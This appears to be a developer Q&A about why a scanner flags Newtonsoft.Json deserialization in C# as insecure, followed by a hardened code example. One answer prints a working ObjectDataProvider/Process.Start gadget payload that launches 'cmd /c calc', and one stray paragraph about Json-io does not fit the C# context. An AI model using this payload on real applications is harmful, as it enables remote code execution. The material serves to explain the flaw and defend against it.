A static security scanner has flagged my C# code on this line:
var result = JsonConvert.DeserializeObject<dynamic>(response);
response will contain a JSON response from a web API.
The scanner has flagged this as "insecure deserialization".
Can someone help me understand how this can be exploited? Web examples are not really clear on whether the exploit can happen within the DeserializeObject method itself or only after the deserialization.
It was determined that your web application performs JSON deserialization of user-supplied data using Json-io library with the support of Polymorphic Type Handling. Arbitrary JSON deserialization using Json-io is inherently unsafe, and should never be performed on untrusted data.
The most typical example of an insecure deserialization vulnerability is when an attacker loads untrusted code into a serialized object, then forwards it to the web application. The application will deserialize the malicious input if there are no checks, allowing it to access even more of its parts.
Newtonsoft.Json is vulnerable to denial-of-service (DoS) due to a stack overflow that can occur whenever nested objects are being processed. A remote attacker could cause a vulnerable application to crash by causing it to process a maliciously crafted JSON object.
JSON is a format that encodes objects in a string. Serialization means to convert an object into that string, and deserialization is its inverse operation (convert string -> object).
Try to deserialize this json:
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName": "Start",
"MethodParameters": {
"$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"$values": [ "cmd", "/c calc" ]
},
"ObjectInstance": { "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" }
}
with this code
dynamic obj = JsonConvert.DeserializeObject<dynamic>(json, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
It will open the Windows calculator application. The same way any executable or script could be run. The problem also persists if you use object instead of dynamic, or the non-generic DeserializeObject method. Be aware that if you don't set TypeNameHandling = TypeNameHandling.Auto, someone else could set the global settings like this:
JsonConvert.DefaultSettings = () =>
new JsonSerializerSettings{TypeNameHandling = TypeNameHandling.Auto};
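A hardened version of the call from the question, written as an added example (it is not code from the answers above); the ApiResponse shape, the allow-list entries and the sample payloads are assumptions:

```csharp
using System;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;

// Concrete shape of the expected API response (assumed for this example)
// instead of dynamic, so only known members are populated.
public sealed class ApiResponse
{
    public string Status { get; set; }
    public int Count { get; set; }
}

// Binder that resolves only explicitly allowed type names. If $type handling is
// ever re-enabled for legitimate polymorphism, gadget types are still refused.
public sealed class AllowListBinder : ISerializationBinder
{
    private readonly Dictionary<string, Type> _allowed = new Dictionary<string, Type>
    {
        ["ApiResponse"] = typeof(ApiResponse),
    };

    public Type BindToType(string assemblyName, string typeName) =>
        _allowed.TryGetValue(typeName, out var t)
            ? t
            : throw new JsonSerializationException($"Type '{typeName}' is not permitted.");

    public void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = null;
        typeName = serializedType.Name;
    }
}

public static class SafeJson
{
    // Per-call settings are applied on top of JsonConvert.DefaultSettings, so a
    // global TypeNameHandling.Auto set elsewhere cannot re-enable $type resolution here.
    private static readonly JsonSerializerSettings Settings = new JsonSerializerSettings
    {
        TypeNameHandling = TypeNameHandling.None,     // $type is treated as a plain property
        SerializationBinder = new AllowListBinder(),  // defence in depth
        MaxDepth = 32,                                // bounds nesting against the stack-overflow DoS
    };

    public static ApiResponse Parse(string json) =>
        JsonConvert.DeserializeObject<ApiResponse>(json, Settings);

    public static void Main()
    {
        // Constructed inputs: a normal response and one carrying an unexpected $type.
        var ok = Parse("{\"Status\":\"ok\",\"Count\":3}");
        var suspicious = Parse("{\"$type\":\"Some.Unexpected.Type, SomeAssembly\",\"Status\":\"x\"}");
        Console.WriteLine($"{ok.Status} {ok.Count} / {suspicious.Status}"); // no type is ever resolved
    }
}
```

With TypeNameHandling.None the second payload deserializes as an ordinary ApiResponse whose unknown members are ignored; no type lookup, constructor or method call is triggered by the $type value.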